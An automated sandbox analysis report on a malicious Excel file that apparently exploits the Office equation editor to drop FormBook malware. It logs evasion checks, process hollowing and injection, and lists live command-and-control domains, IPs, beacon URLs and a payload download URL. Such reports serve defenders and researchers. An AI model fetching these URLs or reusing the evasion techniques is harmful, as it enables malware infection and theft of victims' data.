Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: oustanding 03082921.xlsx Static file information: File size 1328640 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C836 push es; retf 6_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; retf 0001h 6_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; ret 6_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; retn 0001h 6_2_0137CBA3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; iretd 6_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; retf 6_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; retf 0001h 6_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C9C6 push es; ret 6_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078F4 push esp; ret 6_2_004078FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B6C0 push es; iretd 6_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B2A2 push cs; ret 7_2_0041B2A3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415414 push esp; ret 7_2_00415416
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414F46 push cs; ret 7_2_00414F47
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BF12 push dword ptr [8427D5C5h]; ret 7_2_0041C1FF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415FC5 push ebp; ret 7_2_00415FC6
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; retf 0001h 7_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; ret 7_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; retn 0001h 7_2_0137CBA3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C9C6 push es; ret 7_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C836 push es; retf 7_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; iretd 7_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; retf 7_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; retf 0001h 7_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CDFA1 push ecx; ret 7_2_008CDFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B6C0 push es; iretd 7_2_0137C833
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204DFA1 push ecx; ret 9_2_0204DFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B2A2 push cs; ret 9_2_0020B2A3
Source: initial sample Static PE information: section name: .text entropy: 6.91186053545
Source: initial sample Static PE information: section name: .text entropy: 6.91186053545

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3020, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000001F85E4 second address: 00000000001F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000001F896E second address: 00000000001F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3008 Thread sleep time: -43005s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2808 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 43005 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2169813021.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B10 LdrLoadDll, 7_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D26F8 mov eax, dword ptr fs:[00000030h] 7_2_008D26F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020526F8 mov eax, dword ptr fs:[00000030h] 9_2_020526F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe Network Connect: 163.44.239.73 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.iotcloud.technology
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.57.32 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.micheldrake.com
Source: C:\Windows\explorer.exe Domain query: www.adultpeace.com
Source: C:\Windows\explorer.exe Network Connect: 78.31.67.91 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: C00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458692 Sample: oustanding 03082921.xlsx Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 39 www.trendbold.com 2->39 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 13 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 36 2->16         started        signatures3 process4 dnsIp5 47 13.229.216.142, 49167, 80 AMAZON-02US United States 11->47 33 C:\Users\user\AppData\Local\...\dun[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\user\...\~$oustanding 03082921.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Machine Learning detection for dropped file 18->49 51 Tries to detect virtualization through RDTSC time measurements 18->51 53 Injects a PE file into a foreign processes 18->53 21 vbc.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 cleanxcare.com 78.31.67.91, 49168, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 24->41 43 www.ruhexuangou.com 23.82.57.32, 49171, 80 LEASEWEB-USA-SFO-12US United States 24->43 45 7 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 73 Uses netsh to modify the Windows network and firewall settings 24->73 28 netsh.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.0.78.25
 micheldrake.com United States
2635 AUTOMATTICUS true
23.82.57.32
 www.ruhexuangou.com United States
7203 LEASEWEB-USA-SFO-12US true
13.229.216.142
 unknown United States
16509 AMAZON-02US true
34.102.136.180
 iotcloud.technology United States
15169 GOOGLEUS false
163.44.239.73
 adultpeace.com Japan 7506 INTERQGMOInternetIncJP true
78.31.67.91
 cleanxcare.com Germany
24961 MYLOC-ASIPBackboneofmyLocmanagedITAGDE true

Contacted Domains

Name IP Active
micheldrake.com 192.0.78.25 true
adultpeace.com 163.44.239.73 true
iotcloud.technology 34.102.136.180 true
www.ruhexuangou.com 23.82.57.32 true
cleanxcare.com 78.31.67.91 true
www.trendbold.com 64.190.62.111 true
www.iotcloud.technology unknown unknown
www.cleanxcare.com unknown unknown
www.micheldrake.com unknown unknown
www.adultpeace.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.adultpeace.com/p2io/ true
  • URL Reputation: safe
 low
http://www.iotcloud.technology/p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX false
  • Avira URL Cloud: safe
 unknown
http://www.ruhexuangou.com/p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX true
  • Avira URL Cloud: safe
 unknown
http://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX true
  • Avira URL Cloud: safe
 unknown
http://13.229.216.142/www/dun.exe true
  • Avira URL Cloud: safe
 unknown
http://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX true
  • Avira URL Cloud: safe
 unknown
http://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX true
  • Avira URL Cloud: safe
 unknown